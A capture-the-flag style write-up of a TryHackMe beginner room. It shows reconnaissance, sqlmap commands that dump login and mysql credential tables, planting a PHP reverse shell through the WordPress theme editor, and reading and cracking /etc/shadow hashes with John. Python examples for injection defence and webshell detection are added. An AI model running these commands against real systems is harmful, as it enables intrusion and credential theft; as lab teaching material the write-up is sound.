UOPEASY - TryHackMe



University of Portsmouth's beginner room. Although it is marked as a beginner room, there is a lot to learn here which can be applied in the real world.
Note: The IP address shown in the tool output below may differ between steps. Kali is used as the attacking machine.

#1 Deploy the machine and connect to our network.
Just deploy the machine.

#2 Do some basic reconnaissance on the website. What pages can you view? What ports are open? What can you access?
Let's run some tools:
Nmap:
We ran nmap -T4 -A 10.10.128.149
-T<0-5>: Set timing template (higher is faster). The default is 3; we used 4.
-A: Enable OS detection, version detection, script scanning, and traceroute
So it found the following open ports running these services:
  • 80/tcp   open  http      Apache httpd 2.4.7 ((Ubuntu))
  • 443/tcp  open  ssl/http   Apache httpd
  • 8080/tcp open  http     Apache httpd
Our target is running a Website. Open it in a web browser and check it out:

There is not much on the webpage. Let's check whether other pages are hidden using our next tool, gobuster, to brute-force the website's directories and files.

We ran "gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x .php,.js,.html,.txt -u 10.10.128.149 -t 40"
-w Path to the wordlist. We are using the small list here; the same directory also has a medium list which can be used instead.
-x File extension(s) to search for. Other extensions that can also be used are: .asp,.aspx,.jsp,.do,.action,.json,.yml,.yaml,.xml,.cfg,.bak,.md,.sql,.zip,.tar.gz,.tgz
-u The target URL
-t Number of concurrent threads (default 10), for speed.

#3 You should have found some additional pages on different ports. What service does the site most likely use for this page?
Using the above tools we found the following webpages on different ports:
  • http://10.10.178.104/login.php
  • http://10.10.178.104/index.html
  • http://10.10.178.104/phpmyadmin/
  • http://10.10.178.104:8080/wordpress/
  • https://10.10.178.104/wordpress/
Let's run another tool called "whatweb" against all these URLs. That should reveal the technologies used on this website:
As you can see, this reveals a lot of information which can be used to find vulnerabilities in, and exploits for, the identified software.

#4 Using the fact that this site has this service running, how can you exploit it? Do not use SQLMap yet..
It is quite clear that we can try injection attacks against this website.

#5 Try and return 1 on the page by entering certain characters into the form.
Have a look at this resource and read it through: https://www.sqlinjection.net/login/
Let's use the techniques explained there to attack the login form at:
http://10.10.178.104/login.php; it should be pretty easy to get "1".
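To see why the form "returns 1", here is an added Python example (not from the room or this write-up) that builds the same kind of login query two ways against a constructed in-memory SQLite table: by string concatenation, as the vulnerable page evidently does, and parameterised, which is the fix. The table name, column names and credentials are assumptions.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the target's login database (assumed schema)
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")  # constructed credentials
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # Query built by string formatting: a quote in the input changes the SQL itself,
    # so "password = '' OR '1'='1'" is true for every row and COUNT(*) becomes 1
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0]

def login_safe(conn, username, password):
    # Parameterised query: the driver passes the input as data, never as SQL
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0]

def demo():
    """Run both query styles with a valid password and with the classic quote/OR input."""
    conn = make_db()
    bypass = "' OR '1'='1"
    return {
        "vuln_good": login_vulnerable(conn, "admin", "correct-horse"),
        "vuln_bad": login_vulnerable(conn, "admin", "wrong"),
        "vuln_bypass": login_vulnerable(conn, "admin", bypass),
        "safe_good": login_safe(conn, "admin", "correct-horse"),
        "safe_bypass": login_safe(conn, "admin", bypass),
    }

if __name__ == "__main__":
    print(demo())
```

The vulnerable query counts 1 row for the bypass input, which is the "1" the task asks for; the parameterised query counts 0 because the input is compared literally.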


#6 Using SQL injection, can you extract the username and password for this form? You may need the help of Burp's intruder function OR SQLMap.
Let's capture the login request to http://10.10.178.104/login.php in the Burp Suite Proxy.
Copy the raw POST request into a file named post.txt and use it with sqlmap:
sqlmap -r post.txt -p password
-r Load the HTTP request from a file
-p Testable parameter(s)
This clearly indicates that we have a time-based blind SQL injection vulnerability.
We will use the following command to dump the database:
sqlmap -r post.txt -p password --dump
Alternatively, let sqlmap find the form itself and list the databases:
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 --dbs


Let's dump the tables in the wordpress8080 database:
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 --dump -D wordpress8080
We can dump various parts of the database using commands like:
/* List databases */
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 --dbs

/* List tables in database "login" */
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 -D login --tables

/* List tables in database "mysql" */
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 -D mysql --tables

/* Dump all tables in database "wordpress8080" */
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 --dump -D wordpress8080

/* Dump the content of table "users" in database "login" */
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 --dump -D login -T users

/* Dump the content of table "user" in database "mysql" */
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 --dump -D mysql -T user

/* Dump the schema, skipping system databases */
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 --schema --exclude-sysdbs

/* Dump only the "user" and "Password" columns of table "user" in database "mysql" */
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 --dump -D mysql -T user -C user,Password

#7 What was the username?
We get the username while dumping the database in Task 6.

#8 What was the password?
We get the password while dumping the database in Task 6.

#9 Now you have these credentials, where else on the site can you go? Using the credentials you have and another part of the site, login and try to execute remote commands on the server. Use a PHP reverse shell
We saw a link earlier:
  • http://10.10.178.104/phpmyadmin/
Let's log in to this using the username phpmyadmin and the password we found:
We are able to log in:
Let's try to upload a web shell using SQL (search around and you can find lots of examples of that):
Our user 'phpmyadmin' does not have the necessary permissions. Hmm, let's keep looking.
We also saw earlier that we have:
  • http://10.10.178.104:8080/wordpress/
  • https://10.10.178.104/wordpress/
Let's try logging in with the username admin and the password we found at http://10.10.178.104:8080/wordpress/
We are able to log in to the WordPress dashboard as admin. Let's use the theme editor to plant a PHP reverse shell. Go to Appearance -> Editor -> 404 Template.
Take the PHP reverse shell code from:
and just change the IP to that of the attacking machine, then click Update File:
We should already have a netcat listener on our Kali machine; then just browse to this link http://10.10.66.28:8080//wordpress/wp-content/themes/twentyfifteen/404.php
to get a reverse shell:
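From the defender's side, the tampered 404.php above is easy to spot because a theme template has no reason to open sockets or spawn processes. The following Python scanner is an added example (not from the room, the write-up or WordPress itself); it walks a themes directory and reports PHP files calling such functions. The theme tree it builds is constructed, and the function list is an assumption about what typical web and reverse shells use. Setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes the editor the attack relied on.

```python
import os
import re
import tempfile

# PHP functions a theme template should never call (assumed indicator list)
SUSPICIOUS = re.compile(
    r"\b(fsockopen|proc_open|shell_exec|passthru|exec|system|popen|pcntl_exec|eval)\s*\(",
    re.IGNORECASE,
)

def scan_theme_dir(root):
    """Return {relative_path: [function names]} for PHP files that call a suspicious function."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue  # only PHP is executed by the web server
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(fh.read())})
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

def demo():
    """Build a constructed theme tree with one tampered 404.php and scan it."""
    root = tempfile.mkdtemp()
    files = {
        # clean template: only WordPress template tags
        "twentyfifteen/index.php": "<?php get_header(); ?>\n<h1>Home</h1>\n<?php get_footer(); ?>\n",
        # tampered template: opens a socket and spawns a process (constructed fragment)
        "twentyfifteen/404.php": "<?php\n$sock = fsockopen($ip, $port);\n"
                                 "$proc = proc_open('/bin/sh', $spec, $pipes);\n",
        # non-PHP file mentioning exec( is ignored
        "twentyfifteen/style.css": "/* exec( in a comment is not executable */\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return scan_theme_dir(root)

if __name__ == "__main__":
    for path, funcs in demo().items():
        print(f"{path}: {', '.join(funcs)}")
```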

#10 Can you get a reverse shell back to your local machine?
Yes, as shown in the last task.

#11 Can you crack anyone's password? Using the very popular rockyou.txt password list: https://goo.gl/6XcZKJ
From the reverse shell we got, we can read the /etc/shadow file, where we can see the password hashes. These hashes can be cracked using various tools.
The common hash formats are:
  • $1$: MD5-based crypt ('md5crypt')
  • $2$: Blowfish-based crypt ('bcrypt')
  • $sha1$: SHA-1-based crypt ('sha1crypt')
  • $5$: SHA-256-based crypt ('sha256crypt')
  • $6$: SHA-512-based crypt ('sha512crypt')
John the Ripper can be used to crack the password:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt crack.txt
--wordlist The wordlist to try
--format  The hash format as described above; in our case $6$ ==> sha512crypt
crack.txt holds the shadow entries to crack, one per line, in the format USERNAME:PASSWORD-HASH
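Picking the right --format by eye is error-prone, so here is an added Python example (not from the room or the write-up) that parses shadow-style lines according to the $id$ prefixes listed above, skips locked or empty entries, extracts any rounds= parameter, and groups the crackable accounts by john format name. The sample lines and their hash strings are constructed placeholders; the mapping of ids to john names follows the list above, with "descrypt" added for legacy 13-character DES hashes.

```python
# crypt(3) identifier -> john --format name (from the list above, plus bcrypt variants)
CRYPT_FORMATS = {
    "1": "md5crypt",
    "2": "bcrypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "sha1": "sha1crypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
}

def classify_hash(field):
    """Return (john_format, rounds) for one shadow password field; (None, None) if not crackable."""
    if field == "" or field.startswith(("!", "*")):
        return None, None                      # locked account or no password set
    if not field.startswith("$"):
        # legacy DES crypt has no $id$ prefix and is always 13 characters long
        return ("descrypt", None) if len(field) == 13 else (None, None)
    parts = field.split("$")                   # ['', id, (rounds=N), salt, hash]
    fmt = CRYPT_FORMATS.get(parts[1])
    rounds = None
    if len(parts) > 2 and parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
    return fmt, rounds

def parse_shadow(text):
    """Return [(user, format, rounds)] for every non-comment line; only the first two fields matter."""
    result = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue                           # malformed line, skip rather than guess
        fmt, rounds = classify_hash(fields[1])
        result.append((fields[0], fmt, rounds))
    return result

def john_targets(text):
    """Group crackable users by john format so each format needs exactly one john run."""
    groups = {}
    for user, fmt, _ in parse_shadow(text):
        if fmt:
            groups.setdefault(fmt, []).append(user)
    return groups

# Constructed sample shadow lines; the hash strings are placeholders, not real hashes
SAMPLE = """\
root:$6$abc123$FAKEHASHFAKEHASHFAKEHASH:18000:0:99999:7:::
user:$6$rounds=5000$salt$FAKEHASH:18000:0:99999:7:::
legacy:$1$xyz$FAKEMD5:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
nobody:!:18000:0:99999:7:::
"""
```

Running `john_targets(SAMPLE)` tells you that root and user go into one sha512crypt run and legacy into an md5crypt run, while daemon and nobody are skipped.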

#12 What is the final cracked hash password for the user "user"?
The password as cracked in Task 11.

This was a good learning exercise. That's all for now, see you later :)
